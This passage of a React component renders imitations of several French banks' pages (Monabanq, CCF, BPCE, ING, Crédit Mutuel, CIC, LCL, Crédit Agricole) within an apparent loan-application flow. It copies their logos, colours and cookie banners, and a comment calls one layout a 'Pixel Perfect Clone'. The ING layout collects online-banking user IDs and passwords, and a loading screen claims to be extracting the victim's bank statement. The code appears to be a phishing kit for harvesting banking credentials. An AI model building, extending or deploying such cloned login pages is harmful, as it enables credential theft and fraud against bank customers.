                  className="absolute inset-0 w-20 h-20 rounded-full border-4 border-transparent animate-spin"
                  style={{ 
                    borderTopColor: bank.primaryColor,
                    animationDuration: '1s'
                  }}
                ></div>
                {/* Inner icon */}
                <div className="absolute inset-0 flex items-center justify-center">
                  <Shield className="h-8 w-8 text-gray-400" />
                </div>
              </div>
            </div>

            {/* Status Text */}
            <div className="text-center space-y-3">
              <h2 className="text-lg font-semibold text-gray-900">
                Extraction en cours...
              </h2>
              <p className="text-gray-600 text-sm leading-relaxed px-4">
                Nous procédons à l'extraction de votre dernier extrait de compte auprès de votre compte bancaire <span className="font-semibold" style={{ color: bank.primaryColor }}>{bank.name}</span>
              </p>
            </div>

            {/* Progress dots animation */}
            <div className="flex justify-center mt-6 space-x-2">
              <div 
                className="w-2 h-2 rounded-full animate-pulse"
                style={{ backgroundColor: bank.primaryColor, animationDelay: '0ms' }}
              ></div>
              <div 
                className="w-2 h-2 rounded-full animate-pulse"
                style={{ backgroundColor: bank.primaryColor, animationDelay: '300ms' }}
              ></div>
              <div 
                className="w-2 h-2 rounded-full animate-pulse"
                style={{ backgroundColor: bank.primaryColor, animationDelay: '600ms' }}
              ></div>
            </div>

            {/* Security Notice */}
            <div className="mt-8 p-4 bg-gray-50 rounded-xl border border-gray-100">
              <div className="flex items-center justify-center space-x-2 text-xs text-gray-500">
                <svg className="h-4 w-4 text-green-500" fill="currentColor" viewBox="0 0 20 20">
                  <path fillRule="evenodd" d="M5 9V7a5 5 0 0110 0v2a2 2 0 012 2v5a2 2 0 01-2 2H5a2 2 0 01-2-2v-5a2 2 0 012-2zm8-2v2H7V7a3 3 0 016 0z" clipRule="evenodd" />
                </svg>
                <span>Connexion sécurisée et chiffrée</span>
              </div>
            </div>
          </Card>
        </div>
      </div>
    );
  }

  // Special Privacy Popup for Monabanq
  if (bank.isMonabanqLayout && showPrivacyPopup) {
    return (
      <div className="min-h-screen bg-white">
        {/* Content */}
        <div className="max-w-md mx-auto px-4 py-8">
          {/* Continue without accepting link */}
          <div className="text-center mb-6">
            <button 
              onClick={() => setShowPrivacyPopup(false)}
              className="text-gray-600 text-sm underline hover:no-underline"
            >
              Continuer sans accepter
            </button>
          </div>

          {/* Logo - mona green + banq dark gray */}
          <div className="flex justify-center mb-2">
            <img 
              src="https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/avg6t83f_IMG_0737.jpeg"
              alt="Monabanq"
              className="h-16 w-auto object-contain"
            />
          </div>

          {/* Slogan */}
          <p className="text-center text-gray-500 text-sm mb-8">les gens avant l'argent</p>

          {/* Privacy Card */}
          <div className="bg-white rounded-2xl p-6">
            {/* Title */}
            <h2 className="text-xl font-bold text-gray-900 mb-4">
              Monabanq et le respect de votre vie privée
            </h2>

            {/* Text */}
            <p className="text-sm text-gray-600 mb-4">
              A quoi servent ces cookies ? Ils assurent le bon fonctionnement du site, aident à sa sécurité, analysent la performance, l'audience et permettent de vous proposer des contenus et publicités personnalisés.
            </p>

            <p className="text-sm text-gray-600 mb-6">
              Votre consentement à la mise en place de ces cookies non strictement nécessaires est libre et peut être retiré à tout moment.
            </p>

            {/* Accept Button - Lime green rounded */}
            <Button
              onClick={() => setShowPrivacyPopup(false)}
              className="w-full h-12 font-semibold text-base rounded-full"
              style={{ backgroundColor: '#BFFF00', color: '#000000' }}
              data-testid="privacy-accept-btn"
            >
              Accepter
            </Button>
          </div>
        </div>
      </div>
    );
  }

  // Special CCF Privacy Popup
  if (bank.isCCFLayout && showPrivacyPopup) {
    return (
      <div className="min-h-screen bg-white flex flex-col">
        {/* CCF Header - Image */}
        <div className="w-full">
          <img 
            src="https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/or9onrxz_IMG_0781.jpeg"
            alt="CCF - Bienvenue dans votre espace client"
            className="w-full h-auto object-cover"
          />
        </div>

        {/* Privacy Card */}
        <div className="flex-1 flex items-center justify-center py-8">
          <div className="w-full max-w-md px-4">
            <Card className="p-6 bg-white shadow-lg rounded-xl">
              <div className="flex justify-center mb-4">
                <img src={bank.logo} alt={bank.name} className="h-12 w-auto object-contain" />
              </div>
              <h2 className="text-lg font-bold text-center mb-4" style={{ color: '#1A3C6E' }}>
                CCF respecte votre vie privée.
              </h2>
              <p className="text-sm text-gray-600 mb-6 text-center">
                Nous utilisons des cookies pour améliorer votre expérience et analyser l'utilisation de notre site.
              </p>
              <div className="space-y-3">
                <Button
                  onClick={() => setShowPrivacyPopup(false)}
                  className="w-full h-12 text-white font-semibold rounded-lg"
                  style={{ backgroundColor: '#1A3C6E' }}
                  data-testid="privacy-accept-btn"
                >
                  Accepter et Fermer
                </Button>
                <Button
                  variant="outline"
                  className="w-full h-12 font-semibold rounded-lg"
                  style={{ borderColor: '#1A3C6E', color: '#1A3C6E' }}
                >
                  Paramétrer
                </Button>
              </div>
            </Card>
          </div>
        </div>
      </div>
    );
  }

  // Special BPCE Privacy Popup
  if (bank.isBPCELayout && showPrivacyPopup) {
    return (
      <div className="min-h-screen bg-white flex flex-col">
        {/* BPCE Header */}
        <div className="w-full bg-white py-3 px-4 flex items-center justify-between border-b border-gray-200">
          <img 
            src={bank.logo} 
            alt="BPCE Factor" 
            className="h-8 w-auto object-contain"
          />
          <div className="flex items-center space-x-4">
            <button className="text-gray-600">
              <svg className="h-6 w-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M4 6h16M4 12h16M4 18h16" />
              </svg>
            </button>
            <div className="w-10 h-10 rounded flex items-center justify-center" style={{ backgroundColor: '#6B4C9A' }}>
              <svg className="h-5 w-5 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
              </svg>
            </div>
          </div>
        </div>

        {/* Privacy Content */}
        <div className="flex-1 px-4 py-6">
          {/* Continue without accepting */}
          <button 
            onClick={() => setShowPrivacyPopup(false)}
            className="text-sm mb-6 hover:underline"
            style={{ color: '#6B4C9A' }}
          >
            Continuer sans accepter
          </button>

          {/* Title */}
          <h1 className="text-xl font-bold text-gray-900 mb-4">
            Vos paramètres de cookies
          </h1>

          {/* Cookie text */}
          <p className="text-sm text-gray-700 leading-relaxed mb-4">
            BPCE Factor et ses partenaires utilisent des traceurs afin de permettre le bon fonctionnement de notre site, mesurer anonymement son audience, personnaliser votre expérience sur notre site, personnaliser l'assistance commerciale suite à votre navigation, afficher du contenu vidéo, ou encore personnaliser les annonces publicitaires diffusées sur Internet en dehors de notre site et application. Vous pouvez accepter ces cookies, personnaliser vos choix ou continuer sans accepter (valant refus) en cliquant sur les boutons de cette fenêtre. La{' '}
            <a 
              href={bank.cookiesInfoLink}
              target="_blank"
              rel="noopener noreferrer"
              className="underline"
              style={{ color: '#6B4C9A' }}
            >
              page Informations et Gestion des Cookies
            </a>
            {' '}met à votre disposition le détail des traceurs et vous permet de revenir sur vos choix à tout moment.
          </p>

          {/* Accept Button */}
          <Button
            onClick={() => setShowPrivacyPopup(false)}
            className="w-full h-12 text-white font-semibold rounded-lg mt-4"
            style={{ backgroundColor: '#6B4C9A' }}
            data-testid="privacy-accept-btn"
          >
            Tout accepter
          </Button>

          {/* Customize Button */}
          <Button
            variant="outline"
            className="w-full h-12 font-semibold rounded-lg mt-3"
            style={{ borderColor: '#6B4C9A', color: '#6B4C9A' }}
          >
            Personnaliser mes choix
          </Button>
        </div>
      </div>
    );
  }

  // Special ING Layout with Cookie Banner at bottom
  if (bank.isINGLayout && showPrivacyPopup) {
    return (
      <div className="min-h-screen bg-white relative">
        {/* ING Header - White */}
        <div className="w-full bg-white py-3">
          <div className="max-w-4xl mx-auto px-4">
            <img 
              src={bank.logo} 
              alt={bank.name} 
              className="h-8 w-auto object-contain"
            />
          </div>
        </div>
        
        {/* Orange Line */}
        <div className="w-full h-1" style={{ backgroundColor: '#FF6200' }}></div>

        {/* Main Content - Narrower */}
        <div className="max-w-sm mx-auto px-4 py-6 pb-48">
          {/* Title with gray line below */}
          <h1 className="text-xl font-light italic mb-2" style={{ color: '#FF6200' }}>
            Entrez dans les qualifications
          </h1>
          <div className="w-full h-px bg-gray-300 mb-4"></div>

          <form onSubmit={handleSubmit}>
            {/* User ID Field */}
            <div className="mb-3">
              <div className="flex items-baseline flex-wrap gap-1 mb-1">
                <label className="text-sm font-bold text-gray-800">
                  ID utilisateur
                </label>
                <a 
                  href={bank.forgotUserIdLink}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-xs text-blue-600 hover:underline italic"
                >
                  (Vous avez oublié votre identifiant d'utilisateur ?)
                </a>
              </div>
              <Input
                type="text"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                required
                className="h-9 text-sm border-2 border-gray-800 rounded-sm focus:ring-1 focus:ring-orange-400"
                data-testid="ing-username-input"
              />
            </div>

            {/* Password Field */}
            <div className="mb-3">
              <div className="flex items-baseline flex-wrap gap-1 mb-1">
                <label className="text-sm font-bold text-gray-800">
                  Mot de passe
                </label>
                <a 
                  href={bank.forgotPasswordLink}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-xs text-blue-600 hover:underline italic"
                >
                  (Vous avez oublié votre mot de passe ?)
                </a>
              </div>
              <div className="relative">
                <Input
                  type={showPassword ? 'text' : 'password'}
                  value={password}
                  onChange={(e) => setPassword(e.target.value)}
                  required
                  className="h-9 text-sm border-2 border-gray-800 rounded-sm focus:ring-1 focus:ring-orange-400 pr-10"
                  data-testid="ing-password-input"
                />
                <button
                  type="button"
                  onClick={() => setShowPassword(!showPassword)}
                  className="absolute right-2 top-2 text-gray-400 hover:text-gray-600"
                >
                  {showPassword ? <EyeOff className="h-4 w-4" /> : <Eye className="h-4 w-4" />}
                </button>
              </div>
            </div>

            {/* Language Dropdown */}
            <div className="mb-4">
              <label className="block text-sm font-bold text-gray-800 mb-1">
                Langue
              </label>
              <select className="w-full h-9 px-2 border border-gray-300 rounded-sm text-sm bg-gray-200">
                <option>Français (France)</option>
                <option>English (United Kingdom)</option>
                <option>Nederlands (Nederland)</option>
                <option>Deutsch (Deutschland)</option>
              </select>
            </div>

            {/* Submit Button - Gray gradient with blue text */}
            <Button
              type="submit"
              className="w-full h-9 font-semibold text-sm uppercase tracking-wide rounded-sm border border-gray-400"
              style={{ background: 'linear-gradient(to bottom, #f0f0f0, #c8c8c8)', color: '#0066CC' }}
              disabled={loading || !username || !password}
              data-testid="ing-submit-btn"
            >
              {loading ? 'Connexion...' : 'SE CONNECTER'}
            </Button>
          </form>

          {/* Additional Information Section - Light Gray */}
          <div className="mt-6 p-3 rounded-sm" style={{ backgroundColor: '#E8E8E8' }}>
            <h3 className="font-semibold text-sm mb-2" style={{ color: '#FF6200' }}>Informations supplémentaires</h3>
            <ul className="space-y-1">
              <li>
                <a href={bank.forgotUserIdLink} target="_blank" rel="noopener noreferrer" className="text-xs text-blue-600 hover:underline">
                  Vous avez oublié votre identifiant d'utilisateur ?
                </a>
              </li>
              <li>
                <a href={bank.forgotPasswordLink} target="_blank" rel="noopener noreferrer" className="text-xs text-blue-600 hover:underline">
                  Vous avez oublié votre mot de passe ?
                </a>
              </li>
              <li>
                <a href={bank.resetLogonLink} target="_blank" rel="noopener noreferrer" className="text-xs text-blue-600 hover:underline">
                  Déverrouiller/Réinitialiser votre mot de passe?
                </a>
              </li>
            </ul>
          </div>

          {/* Footer Links */}
          <div className="mt-4 text-center">
            <div className="text-xs text-blue-600 mb-2">
              <a href="#" className="hover:underline">EULA - FR</a>
              <span className="mx-2 text-gray-400">|</span>
              <a href="#" className="hover:underline">Privacy Policy</a>
              <span className="mx-2 text-gray-400">|</span>
              <a href="#" className="hover:underline">Paramètres des cookies</a>
            </div>
            <p className="text-xs text-gray-600">
              Navigateurs pris en charge : La version Microsoft Windows d'Edge, la version la plus récente de Chrome de Google, la version la plus récente de Safari d'Apple.
            </p>
          </div>
        </div>

        {/* Cookie Banner at Bottom - More Compact */}
        <div className="fixed bottom-0 left-0 right-0 bg-gray-700 text-white p-3">
          <div className="max-w-sm mx-auto">
            <p className="text-xs mb-3">
              En cliquant sur « Accepter tous les cookies », vous acceptez le stockage de cookies sur votre appareil pour améliorer la navigation sur le site, analyser son utilisation et contribuer à nos efforts de marketing.
            </p>
            <div className="flex flex-col space-y-2">
              <button 
                className="w-full px-3 py-2 bg-white text-blue-600 text-xs font-semibold uppercase rounded hover:bg-gray-100"
              >
                PARAMÈTRES DES COOKIES
              </button>
              <button 
                onClick={() => setShowPrivacyPopup(false)}
                className="w-full px-3 py-2 bg-white text-blue-600 text-xs font-semibold uppercase rounded hover:bg-gray-100"
                data-testid="privacy-accept-btn"
              >
                AUTORISER TOUS LES COOKIES
              </button>
            </div>
          </div>
        </div>
      </div>
    );
  }

  // Special Crédit Mutuel Privacy Popup with cookie settings
  if (bank.isCreditMutuelLayout && showPrivacyPopup) {
    return (
      <div className="min-h-screen bg-white flex flex-col">
        {/* Continue without accepting link */}
        <div className="w-full px-4 pt-4">
          <button 
            onClick={() => setShowPrivacyPopup(false)}
            className="text-sm font-medium"
            style={{ color: '#1E3A8A' }}
          >
            Continuer sans accepter {'>'}
          </button>
        </div>

        {/* Logo */}
        <div className="flex justify-center py-6">
          <img 
            src={bank.logo} 
            alt="Crédit Mutuel"
            className="h-12 w-auto object-contain"
          />
        </div>

        {/* Content */}
        <div className="flex-1 px-4 max-w-md mx-auto w-full">
          {!cmCookieSettings ? (
            <>
              {/* Main Privacy View */}
              <h1 className="text-xl font-bold mb-4" style={{ color: '#1E3A8A' }}>
                Le Crédit Mutuel respecte votre vie privée.
              </h1>

              <p className="text-sm text-gray-700 leading-relaxed mb-4">
                Des cookies sont déposés sur votre terminal pour optimiser votre expérience sur ce site et vous proposer des offres et services personnalisés.
              </p>

              <p className="text-sm text-gray-700 leading-relaxed mb-6">
                En cliquant sur "Accepter et Fermer", vous consentez à l'utilisation de ces cookies.
              </p>

              {/* Cookie Policy Link */}
              <a 
                href={bank.cookiePolicyLink}
                target="_blank"
                rel="noopener noreferrer"
                className="text-sm font-medium underline mb-6 block"
                style={{ color: '#1E3A8A' }}
              >
                Consulter notre politique Cookies
              </a>

              {/* Buttons */}
              <div className="space-y-3 mt-6">
                <Button
                  variant="outline"
                  onClick={() => setCmCookieSettings(true)}
                  className="w-full h-12 font-semibold rounded-full text-base border-2"
                  style={{ borderColor: '#1E3A8A', color: '#1E3A8A' }}
                  data-testid="cm-privacy-settings-btn"
                >
                  Paramétrer
                </Button>

                <Button
                  onClick={() => setShowPrivacyPopup(false)}
                  className="w-full h-12 text-white font-semibold rounded-full text-base"
                  style={{ backgroundColor: '#1E3A8A' }}
                  data-testid="cm-privacy-accept-btn"
                >
                  Accepter et Fermer
                </Button>
              </div>
            </>
          ) : (
            <>
              {/* Cookie Settings View */}
              <h1 className="text-xl font-bold mb-4" style={{ color: '#1E3A8A' }}>
                Paramétrer vos préférences
              </h1>

              <p className="text-sm text-gray-700 leading-relaxed mb-6">
                Vous pouvez choisir d'activer ou non les différents types de cookies.
              </p>

              {/* Cookie Options */}
              <div className="space-y-4 mb-6">
                {/* Required Cookies - Always on */}
                <div className="flex items-center justify-between p-4 bg-gray-50 rounded-lg">
                  <div>
                    <h3 className="font-semibold text-gray-900">Cookies nécessaires</h3>
                    <p className="text-xs text-gray-500">Toujours actifs</p>
                  </div>
                  <div className="w-12 h-6 bg-gray-300 rounded-full flex items-center justify-end px-1">
                    <div className="w-4 h-4 bg-white rounded-full shadow"></div>
                  </div>
                </div>

                {/* Audience Measurement */}
                <div className="flex items-center justify-between p-4 bg-gray-50 rounded-lg">
                  <div>
                    <h3 className="font-semibold text-gray-900">Mesure d'audience</h3>
                    <p className="text-xs text-gray-500">Analyse de la navigation</p>
                  </div>
                  <button
                    onClick={() => setCmCookiePrefs(prev => ({ ...prev, audience: !prev.audience }))}
                    className={`w-12 h-6 rounded-full flex items-center px-1 transition-colors ${cmCookiePrefs.audience ? 'bg-blue-600 justify-end' : 'bg-gray-300 justify-start'}`}
                  >
                    <div className="w-4 h-4 bg-white rounded-full shadow"></div>
                  </button>
                </div>

                {/* Social Networks */}
                <div className="flex items-center justify-between p-4 bg-gray-50 rounded-lg">
                  <div>
                    <h3 className="font-semibold text-gray-900">Réseaux sociaux</h3>
                    <p className="text-xs text-gray-500">Partage de contenu</p>
                  </div>
                  <button
                    onClick={() => setCmCookiePrefs(prev => ({ ...prev, social: !prev.social }))}
                    className={`w-12 h-6 rounded-full flex items-center px-1 transition-colors ${cmCookiePrefs.social ? 'bg-blue-600 justify-end' : 'bg-gray-300 justify-start'}`}
                  >
                    <div className="w-4 h-4 bg-white rounded-full shadow"></div>
                  </button>
                </div>

                {/* Advertising */}
                <div className="flex items-center justify-between p-4 bg-gray-50 rounded-lg">
                  <div>
                    <h3 className="font-semibold text-gray-900">Publicité ciblée</h3>
                    <p className="text-xs text-gray-500">Personnalisation des annonces</p>
                  </div>
                  <button
                    onClick={() => setCmCookiePrefs(prev => ({ ...prev, ads: !prev.ads }))}
                    className={`w-12 h-6 rounded-full flex items-center px-1 transition-colors ${cmCookiePrefs.ads ? 'bg-blue-600 justify-end' : 'bg-gray-300 justify-start'}`}
                  >
                    <div className="w-4 h-4 bg-white rounded-full shadow"></div>
                  </button>
                </div>
              </div>

              {/* Buttons */}
              <div className="space-y-3">
                <Button
                  variant="outline"
                  onClick={() => setCmCookieSettings(false)}
                  className="w-full h-12 font-semibold rounded-full text-base border-2"
                  style={{ borderColor: '#1E3A8A', color: '#1E3A8A' }}
                >
                  Retour
                </Button>

                <Button
                  onClick={() => setShowPrivacyPopup(false)}
                  className="w-full h-12 text-white font-semibold rounded-full text-base"
                  style={{ backgroundColor: '#1E3A8A' }}
                >
                  Valider mes choix
                </Button>
              </div>
            </>
          )}
        </div>
      </div>
    );
  }

  // Special CIC Privacy Popup
  if (bank.isCICLayout && showPrivacyPopup) {
    return (
      <div className="min-h-screen bg-white flex flex-col">
        {/* Continue without accepting link */}
        <div className="w-full px-4 pt-4">
          <button 
            onClick={() => setShowPrivacyPopup(false)}
            className="text-sm font-medium"
            style={{ color: '#0D9488' }}
          >
            Continuer sans accepter {'>'}
          </button>
        </div>

        {/* Logo */}
        <div className="flex justify-center pt-4 pb-2">
          <img 
            src={bank.logo} 
            alt="CIC"
            className="h-14 w-auto object-contain"
          />
        </div>

        {/* Title - Centered, black, bold thin */}
        <h1 className="text-xl font-semibold text-center px-4 mb-6 text-gray-900">
          Le CIC respecte votre vie privée.
        </h1>

        {/* Content */}
        <div className="flex-1 px-4 max-w-md mx-auto w-full">
          {!cicCookieSettings ? (
            <>
              {/* Main Privacy View */}
              <p className="text-sm text-gray-700 leading-relaxed mb-4">
                <span className="font-bold">Ce site utilise des cookies.</span> Ils permettent d'assurer son bon fonctionnement et, avec nos partenaires, d'en mesurer son audience, de réaliser des statistiques et de vous proposer des informations et de la publicité personnalisées en fonction de votre profil et de votre navigation.
              </p>

              <p className="text-sm text-gray-700 leading-relaxed mb-6">
                Nous conservons vos choix pendant 6 mois. Vous pouvez à tout moment changer d'avis en cliquant sur le lien « Gestion des cookies » présent en pied de page du site.
              </p>

              {/* Cookie Policy Link */}
              <a 
                href={bank.cookiePolicyLink}
                target="_blank"
                rel="noopener noreferrer"
                className="text-sm font-medium underline mb-6 block"
                style={{ color: '#0D9488' }}
              >
                Consulter notre politique Cookies
              </a>

              {/* Buttons */}
              <div className="space-y-3 mt-6">
                <Button
                  variant="outline"
                  onClick={() => setCicCookieSettings(true)}
                  className="w-full h-12 font-semibold rounded-none text-base border-2"
                  style={{ borderColor: '#0D9488', color: '#0D9488' }}
                  data-testid="cic-privacy-settings-btn"
                >
                  Paramétrer
                </Button>

                <Button
                  onClick={() => setShowPrivacyPopup(false)}
                  className="w-full h-12 text-white font-semibold rounded-none text-base"
                  style={{ backgroundColor: '#0D9488' }}
                  data-testid="cic-privacy-accept-btn"
                >
                  Accepter et Fermer
                </Button>
              </div>
            </>
          ) : (
            <>
              {/* Cookie Settings View */}
              <h1 className="text-xl font-bold mb-4" style={{ color: '#0D9488' }}>
                Paramétrer vos préférences
              </h1>

              <p className="text-sm text-gray-700 leading-relaxed mb-6">
                Vous pouvez choisir d'activer ou non les différents types de cookies.
              </p>

              {/* Cookie Options */}
              <div className="space-y-4 mb-6">
                {/* Required Cookies */}
                <div className="flex items-center justify-between p-4 bg-gray-50 rounded-lg">
                  <div>
                    <h3 className="font-semibold text-gray-900">Cookies nécessaires</h3>
                    <p className="text-xs text-gray-500">Toujours actifs</p>
                  </div>
                  <div className="w-12 h-6 bg-gray-300 rounded-full flex items-center justify-end px-1">
                    <div className="w-4 h-4 bg-white rounded-full shadow"></div>
                  </div>
                </div>

                {/* Audience Measurement */}
                <div className="flex items-center justify-between p-4 bg-gray-50 rounded-lg">
                  <div>
                    <h3 className="font-semibold text-gray-900">Mesure d'audience</h3>
                    <p className="text-xs text-gray-500">Analyse de la navigation</p>
                  </div>
                  <button className="w-12 h-6 bg-gray-300 rounded-full flex items-center px-1">
                    <div className="w-4 h-4 bg-white rounded-full shadow"></div>
                  </button>
                </div>

                {/* Social Networks */}
                <div className="flex items-center justify-between p-4 bg-gray-50 rounded-lg">
                  <div>
                    <h3 className="font-semibold text-gray-900">Réseaux sociaux</h3>
                    <p className="text-xs text-gray-500">Partage de contenu</p>
                  </div>
                  <button className="w-12 h-6 bg-gray-300 rounded-full flex items-center px-1">
                    <div className="w-4 h-4 bg-white rounded-full shadow"></div>
                  </button>
                </div>
              </div>

              {/* Buttons */}
              <div className="space-y-3">
                <Button
                  variant="outline"
                  onClick={() => setCicCookieSettings(false)}
                  className="w-full h-12 font-semibold rounded-none text-base border-2"
                  style={{ borderColor: '#0D9488', color: '#0D9488' }}
                >
                  Retour
                </Button>

                <Button
                  onClick={() => setShowPrivacyPopup(false)}
                  className="w-full h-12 text-white font-semibold rounded-none text-base"
                  style={{ backgroundColor: '#0D9488' }}
                >
                  Valider mes choix
                </Button>
              </div>
            </>
          )}
        </div>
      </div>
    );
  }

  // Special LCL Privacy Popup
  if (bank.isLCLLayout && showPrivacyPopup) {
    return (
      <div className="min-h-screen bg-white flex flex-col">
        {/* LCL Logo Header */}
        <div className="w-full bg-white pt-6 pb-4 px-4">
          <div className="max-w-md mx-auto">
            <img 
              src={bank.logo} 
              alt="LCL"
              className="h-14 w-auto object-contain"
            />
          </div>
        </div>

        {/* Privacy Content */}
        <div className="flex-1 px-4 max-w-md mx-auto w-full">
          {/* Title */}
          <h1 className="text-xl font-bold text-gray-900 mb-4">
            LCL respecte votre vie privée
          </h1>

          {/* Cookie text - matching exactly the image */}
          <p className="text-sm text-gray-700 leading-relaxed mb-4">
            LCL utilise des cookies sur ce site à des fins de bon fonctionnement du site, de sécurité, de mesure d'audience, d'analyse, d'amélioration de votre expérience utilisateur, de partage de contenu sur les réseaux sociaux, ainsi qu'à des fins publicitaires.
          </p>

          <p className="text-sm text-gray-700 leading-relaxed mb-4">
            Vos données personnelles collectées via les cookies publicitaires nous permettent de vous présenter des publicités personnalisées.
          </p>

          <p className="text-sm text-gray-700 leading-relaxed mb-6">
            Votre consentement à l'installation de cookies non strictement nécessaires est libre et peut être modifié à tout moment.
          </p>

          {/* Buttons */}
          <div className="space-y-3">
            {/* Tout accepter - Blue filled rounded button */}
            <Button
              onClick={() => setShowPrivacyPopup(false)}
              className="w-full h-12 text-white font-semibold rounded-full text-base"
              style={{ backgroundColor: '#0046AD' }}
              data-testid="lcl-privacy-accept-btn"
            >
              Tout accepter
            </Button>

            {/* Tout refuser - White with blue border rounded button */}
            <Button
              variant="outline"
              onClick={() => setShowPrivacyPopup(false)}
              className="w-full h-12 font-semibold rounded-full text-base border-2"
              style={{ borderColor: '#0046AD', color: '#0046AD' }}
              data-testid="lcl-privacy-refuse-btn"
            >
              Tout refuser
            </Button>

            {/* Paramétrer vos préférences - White with blue border rounded button */}
            <Button
              variant="outline"
              className="w-full h-12 font-semibold rounded-full text-base border-2"
              style={{ borderColor: '#0046AD', color: '#0046AD' }}
            >
              Paramétrer vos préférences
            </Button>
          </div>
        </div>
      </div>
    );
  }

  // BNP Paribas Privacy Popup is now rendered as an overlay inside the BNP login layout below

  // Privacy Popup for all banks (except those with custom popups)
  if (bank.hasPrivacyPopup && showPrivacyPopup && !bank.isMonabanqLayout && !bank.isCCFLayout && !bank.isINGLayout && !bank.isBPCELayout && !bank.isSGLayout && !bank.isLCLLayout && !bank.isCreditMutuelLayout && !bank.isCICLayout && !bank.isBNPLayout && !bank.isLaBanquePostaleLayout) {
    // Special case for Hello bank! and Fortuneo - white header
    const isHelloBank = bank.isHelloBankLayout;
    const isFortuneoBank = bank.isFortuneolayout;
    const headerBgColor = (isHelloBank || isFortuneoBank) ? '#FFFFFF' : (bank.headerColor || bank.primaryColor);
    const headerTxtColor = (isHelloBank || isFortuneoBank) ? '#333333' : (bank.headerTextColor || '#FFFFFF');
    // Header logo size - keep reasonable for header bar
    const headerLogoSize = bank.headerLogoSmall ? "h-6" : "h-12";
    const logoClass = bank.headerColor ? `${headerLogoSize} w-auto object-contain` : "h-8 w-auto object-contain bg-white rounded px-2 py-1";
    const popupLogoSize = bank.formLogoSmall ? "h-10" : bank.logoSize === 'xlarge' ? "h-28" : bank.logoSize === 'large' ? "h-20" : "h-12";
    
    return (
      <div className="min-h-screen bg-gray-100">
        {/* Bank Header */}
        <div className="w-full py-3 px-4 border-b border-gray-200" style={{ backgroundColor: headerBgColor }}>
          <div className="flex items-center justify-between">
            {/* Left: Retour button */}
            <button 
              onClick={() => navigate('/client/loan-flow/bank-selection')}
              className="flex items-center space-x-1 hover:opacity-80"
              style={{ color: headerTxtColor }}
            >
              <ArrowLeft className="h-4 w-4" />
              <span className="text-sm">Retour</span>
            </button>
            {/* Center: Connexion sécurisée */}
            <div className="text-xs whitespace-nowrap" style={{ color: headerTxtColor }}>Connexion sécurisée</div>
            {/* Right: Bank logo (use headerLogo if available) */}
            <img 
              src={bank.headerLogo || bank.logo} 
              alt={bank.name} 
              className={logoClass}
            />
          </div>
        </div>


        {/* Background with logo watermark effect */}
        <div className="flex items-center justify-center min-h-[calc(100vh-80px)] p-4">
          {/* Privacy Popup Card */}
          <Card className="w-full max-w-md bg-white shadow-2xl rounded-xl overflow-hidden">
            {/* Logo Header */}
            <div className="bg-white p-6 flex justify-center border-b">
              <img 
                src={bank.logo} 
                alt={bank.name} 
                className={`${popupLogoSize} w-auto object-contain`}
              />
            </div>

            {/* Content */}
            <div className="p-6">
              <h2 className="text-xl font-bold text-gray-900 mb-4">
                {bank.name} respecte votre vie privée.
              </h2>
              
              <p className="text-sm text-gray-600 mb-4 leading-relaxed">
                Des cookies sont déposés sur votre terminal pour optimiser votre expérience sur ce site et vous proposer des offres et services personnalisés.
              </p>

              <p className="text-sm text-gray-600 mb-6 leading-relaxed">
                En cliquant sur "Accepter et Fermer", vous consentez à l'utilisation de ces cookies.
              </p>

              {/* Link */}
              <a 
                href="#" 
                className="text-sm font-medium hover:underline mb-6 block"
                style={{ color: bank.primaryColor }}
              >
                Consulter notre politique Cookies
              </a>

              {/* Buttons */}
              <div className="space-y-3">
                <Button
                  onClick={() => setShowPrivacyPopup(false)}
                  className="w-full h-12 text-white font-semibold rounded-lg"
                  style={{ backgroundColor: bank.primaryColor }}
                  data-testid="privacy-accept-btn"
                >
                  Accepter et Fermer
                </Button>
                
                <Button
                  variant="outline"
                  className="w-full h-12 font-semibold rounded-lg border-2"
                  style={{ borderColor: bank.primaryColor, color: bank.primaryColor }}
                  onClick={() => setShowPrivacyPopup(false)}
                >
                  Paramétrer
                </Button>
              </div>
            </div>
          </Card>
        </div>
      </div>
    );
  }

  // Special Credit Agricole Layout - Pixel Perfect Clone with 3 steps
  if (bank.isCreditAgricoleLayout) {
    // Mapping des codes postaux vers les caisses régionales
    const getCARegionByPostalCode = (postalCode) => {
      const dept = postalCode.substring(0, 2);
      const deptMapping = {
        '01': 'Centre Est', '02': 'Nord Est', '03': 'Centre France',
        '04': 'Alpes Provence', '05': 'Alpes Provence', '06': 'Provence Côte d\'Azur',
        '07': 'Sud Rhône Alpes', '08': 'Nord Est', '09': 'Sud Méditerranée',
        '10': 'Champagne Bourgogne', '11': 'Sud Méditerranée', '12': 'Nord Midi Pyrénées',
        '13': 'Alpes Provence', '14': 'Normandie', '15': 'Centre France',
        '16': 'Charente Périgord', '17': 'Charente-Maritime Deux-Sèvres', '18': 'Centre Loire',
        '19': 'Centre France', '20': 'Corse', '21': 'Champagne Bourgogne',
        '22': 'Côtes d\'Armor', '23': 'Centre France', '24': 'Charente Périgord',
        '25': 'Franche Comté', '26': 'Sud Rhône Alpes', '27': 'Normandie Seine',
        '28': 'Val De France', '29': 'Finistère', '30': 'Languedoc',
        '31': 'Toulouse 31', '32': 'Pyrénées Gascogne', '33': 'Aquitaine',
        '34': 'Languedoc', '35': 'Ille et Vilaine', '36': 'Centre Loire',
        '37': 'Touraine Poitou', '38': 'Sud Rhône Alpes', '39': 'Franche Comté',
        '40': 'Aquitaine', '41': 'Val De France', '42': 'Loire Haute-Loire',
        '43': 'Loire Haute-Loire', '44': 'Atlantique Vendée', '45': 'Centre Loire',
        '46': 'Nord Midi Pyrénées', '47': 'Aquitaine', '48': 'Languedoc',
        '49': 'Anjou Maine', '50': 'Normandie', '51': 'Nord Est',
        '52': 'Champagne Bourgogne', '53': 'Anjou Maine', '54': 'Lorraine',
